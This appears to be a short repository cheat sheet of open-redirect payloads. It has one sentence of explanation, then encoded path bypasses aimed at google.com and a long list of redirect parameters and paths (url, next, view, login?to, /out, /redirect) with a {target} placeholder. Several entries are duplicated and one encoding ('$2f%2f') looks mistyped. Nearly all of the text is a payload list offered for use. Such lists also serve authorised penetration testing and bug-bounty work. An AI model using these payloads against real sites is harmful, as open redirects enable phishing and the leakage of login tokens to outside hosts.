open_redirect

just way to clear how open redirect work most of the time it be with login and singout pages

/%09/google.com

/%5cgoogle.com

//google.com/

//google.com/%2f..

//\google.com

/\victim.com:80%40google.com

Possible open redirect parameters

?url=http://{target}

?url=https://{target}

?next=http://{target}

?next=https://{target}

?url=https://{target}

?url=http://{target}

?url=//{target}

?url=$2f%2f{target}

?next=//{target}

?next=$2f%2f{target}

?url=//{target}

?url=$2f%2f{target}

?url=//{target}

/redirect/{target}

/cgi-bin/redirect.cgi?{target}

/out/{target}

/out?{target}

/out?/{target}

/out?//{target}

/out?/{target}

/out?///{target}

?view={target}

?view=/{target}

?view=//{target}

?view=/{target}

?view=///{target}

/login?to={target}

/login?to=/{target}

/login?to=//{target}

/login?to=/{target}

/login?to=///{target}

Fighteros/open_redirect